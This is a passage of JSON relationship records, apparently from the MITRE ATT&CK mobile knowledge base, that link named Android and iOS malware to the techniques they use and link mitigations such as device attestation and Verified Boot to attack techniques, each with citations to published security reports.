connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:42.930Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has used HTTPS for C2 communication.(Citation: Lookout Uyghur Campaign) ", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.112Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads information about installed packages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--268c12df-d3bc-46fa-99e9-32caab50b175", + "created": "2022-03-30T15:52:09.759Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken or rooted devices.", + "modified": "2022-03-30T15:52:09.759Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a5dac41f-4a16-44ea-b279-b84c927ce62d", + "created": "2019-09-03T20:08:00.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . 
Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:11:36.853Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) communicates with the command and control server using HTTP requests.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6ba09d73-4ed5-4a37-8191-fc54a8f01696", + "created": "2022-03-28T19:38:23.189Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-28T19:38:23.190Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--127e6672-d16a-4370-b277-4d04874a4cfe", + "created": "2023-02-06T19:37:24.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T19:29:31.138Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use overlays capture banking credentials and credit card information, and can open arbitrary WebViews from the C2.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--289f5e23-088a-4840-a2a6-bab30da2a64b", + "created": "2022-04-01T16:51:04.584Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "GoogleIO2016", + "url": "https://www.youtube.com/watch?v=XZzLjllizYs", + "description": "Adrian Ludwig. (2016, May 19). What's new in Android security (M and N Version). Retrieved December 9, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Changes were introduced in Android 7 to make abuse of device administrator permissions more difficult.(Citation: GoogleIO2016)", + "modified": "2022-04-01T16:51:04.584Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1db350b2-1e8b-4d58-9086-eac41de1b110", + "created": "2022-04-05T17:13:56.584Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:13:56.584Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2c5b36b4-5381-4d9e-9ce5-cd7cd19041b1", + "created": "2020-07-20T13:27:33.514Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . 
Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:47.258Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can delete files from the device.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--21e179f2-49c9-4ec9-ac7a-b8eae8e15bd9", + "created": "2020-07-20T13:27:33.509Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . 
Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:36:07.297Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect the device’s call log.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c656539-aa1e-42db-9016-d38f1daaae16", + "created": "2023-01-18T19:20:26.156Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:06:05.822Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can collect user SMS messages.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6001f77a-da30-4ebc-85fd-5bf9afe5f0a1", + "created": "2023-03-15T16:24:12.588Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:24:12.588Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--393300c4-6852-466d-a163-1d51330fe055", + "created": "2023-03-20T18:45:39.292Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:48:50.839Z", + "description": "", + "relationship_type": "detects", + "source_ref": 
"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82b58c75-239e-4dac-b848-bc1f3354adc4", + "created": "2023-03-20T18:41:18.288Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:18.288Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4ee57616-7205-490c-86c3-c27dcffd8689", + "created": "2022-04-06T13:35:43.203Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent OS versions have limited access to certain APIs unless certain conditions are met, making [Data Manipulation](https://attack.mitre.org/techniques/T1641) more difficult", + "modified": "2022-04-06T13:35:43.203Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + 
"type": "relationship", + "id": "relationship--51d31e17-6c80-4ab3-9e8e-6231483e0999", + "created": "2020-11-24T17:55:12.818Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:12.197Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can register for the `BOOT_COMPLETED` broadcast intent.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a34f3873-3df7-4e93-915c-fc2b4af3444d", + "created": "2020-07-15T20:20:59.380Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mandrake](https://attack.mitre.org/software/S0485) has used Firebase for C2.(Citation: Bitdefender Mandrake)", + "modified": "2022-04-18T19:18:24.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dbef53a9-f9c4-4582-8e93-349ad488de12", + "created": "2023-02-28T21:42:06.525Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:27:42.197Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request permission to view call logs.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f9d0cfb5-aeda-4de4-9c72-7098297555ae", + "created": "2019-09-04T20:01:42.753Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Nightwatch screencap April 2016", + "url": "https://wwws.nightwatchcybersecurity.com/2016/04/13/research-securing-android-applications-from-screen-capture/", + "description": "Nightwatch Cybersecurity. (2016, April 13). Research: Securing Android Applications from Screen Capture (FLAG_SECURE). Retrieved November 5, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Application developers can apply the `FLAG_SECURE` property to sensitive screens within their apps to make it more difficult for the screen contents to be captured.(Citation: Nightwatch screencap April 2016) ", + "modified": "2022-04-01T13:31:59.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38ec048f-7f6e-4bbd-9455-1b1e54968af4", + "created": "2023-03-30T15:18:37.934Z", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. 
Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:18:37.934Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can take screenshots and abuse the Android Screen Cast feature to capture screen data.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2e3a5d0d-a80a-4606-8be2-208302e995d1", + "created": "2020-12-24T21:45:56.920Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:16:17.615Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has attempted to trick users into enabling installation of applications from unknown sources.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1250f91c-723d-4b4c-afea-b3a71101951f", + "type": "relationship", + "created": "2019-08-07T15:57:13.415Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." 
+ } + ], + "modified": "2019-09-15T15:36:42.339Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can query the device's IMEI.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--269d4409-e287-4ef3-b5f3-765ec03e503e", + "created": "2020-06-02T14:32:31.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:18:38.700Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) grants itself permissions by injecting its hash into the kernel’s trust cache.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d621eba9-676f-47a4-8358-d68eeff2fb9a", + "created": "2023-03-03T16:25:09.978Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). 
YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:25:09.978Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is believed to have initially infected devices using internet traffic hijacking to generate abnormal popups.(Citation: paloalto_yispecter_1015) ", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--57df3046-2f14-4bb8-93e9-84a9c8b46791", + "created": "2022-03-30T19:33:17.520Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Inform users that device rooting or granting unnecessary access to the accessibility service presents security risks that could be taken advantage of without their knowledge.", + "modified": "2022-03-30T19:33:17.520Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4f2ae057-ef0b-4995-b24d-348a76a74a4f", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) uses SMS for command and control.(Citation: Lookout-Pegasus)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--75770898-93a7-45e3-bdb2-03172004a88f", + "created": "2022-03-30T14:49:47.451Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android Verified Boot can detect unauthorized modifications made to the system partition, which could lead to execution flow hijacking.(Citation: Android-VerifiedBoot) ", + "modified": "2022-03-30T14:49:47.451Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6d88242f-e45b-481c-bd41-b66a662618ce", + "created": "2022-04-06T13:57:24.730Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:24.730Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 